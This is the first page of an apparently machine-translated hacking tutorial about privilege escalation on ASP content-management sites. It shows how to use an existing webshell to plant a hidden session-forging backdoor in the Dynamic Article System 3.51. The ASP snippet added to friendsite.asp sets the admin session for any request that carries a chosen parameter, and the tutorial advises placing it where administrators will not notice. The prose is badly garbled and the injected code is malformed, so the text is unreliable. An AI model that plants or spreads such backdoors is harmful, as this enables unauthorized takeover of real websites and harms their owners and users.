Using ASP Trojan Horse program to obtain administrative rights

Program | Trojan time before the flooding of the Dynamic Network Forum upload vulnerabilities and the recent spate of various ASP system exposure to upload loopholes, may be a lot of friends in the hands of a lot of Webshell broiler, as to choose how the way these chicks are different, someone to continue to improve the rights, further invasion, Some people just look at, the horse put up after the forgotten, there are some friends, when the webshell of fresh power past the background of the mystery and temptation is greatly increased.

In fact, for many powerful systems, to get backstage is to get a good back door, but now compare the new version of many ASP system passwords are MD5 encryption and then with strict verification procedures to verify, but we have no way to break through these restrictions? No! I'm going to say today how to break through these restrictions let's go straight backstage, have a horse stables is good work, follow me ...

Session Cheat Chapter

First of all, simply say the general ASP system authentication principle. In general, the backend administrator in the login page input account password, the program will take his user name password to the database to the Administrator table to find, if there is this person's account password that you are the administrator, and then give you a representation of your identity of the session value. or the program first of your username to extract the password, and then to the database administrator in the table to take out the administrator's account password to be compared with your submission, if equal, as above to give you a sesion value to represent your identity. Then you go into any admin page and it's all about verifying your session value first, and if it's the admin that lets you through, it's not going to lead you back to the login page or some weird warnings that are related to the programmer's personal preferences.

Know the principle, we are now a train of thought is through our ASP Trojan to modify its program and then get an administrator session, so that although we do not have the administrator password, but we have the same in the backstage. I call this method session deception. Limited to the length of each system can be described in detail, this article only to the dynamic article system as an example to illustrate.

Power article System 3.51, (figure I)

Figure I In fact, all versions of the Power article system were killed, including moving easily. We can practice it by ourselves.

Let's take a look at the verification content first. Dynamic article 3.51 of the verification page in admin_chklogin.asp, its verification content is as follows:

............
Else
RS ("Lastloginip") =request.servervariables ("REMOTE_ADDR")
RS ("Lastlogintime") =now ()
RS ("Logintimes") =rs ("Logintimes") +1
Rs.update
Session. Timeout=sessiontimeout
Session ("AdminName") =rs ("username")
Rs.close
Set rs=nothing
Call Closeconn ()
Response.Redirect "Admin_index.asp"

The preceding ellipsis is the incorrect authentication of the username password until else, look, if the username password is correct, give you two session values:

Session. Timeout=sessiontimeout
Session ("AdminName") =rs ("username")

We're looking at how other admin pages validate the session, admin_index.asp from the start:

It seems to be very tight, but let's see, it's worth verifying a adminname session, as long as our session content is AdminName words can not be passed? All right, let's get this started, we're going to start with the admin account. Go to his website or download it directly to the database to see it. We find a page to change, I find a relatively no one and more content of the page friendsite.asp (Friendship link page) to change, oh, so the administrator is also difficult to find out AH. Use the ASP Trojan's editing function to edit its content. Add the following words to the hidden place under his page:

Dim id
Id=trim (Request ("Qwe"))
If id= "then"
Session ("adminname") = "admin" is assumed here, the actual operation can be changed to you want Administrator account
End If

[1] [2] Next page